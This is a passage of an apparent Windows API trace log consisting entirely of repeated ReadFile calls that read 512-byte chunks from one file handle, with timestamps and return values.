lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.834] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 
[0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, 
lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.835] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, 
lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.836] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: 
lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.837] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, 
lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.838] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.839] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.840] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 
[0212.841] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, 
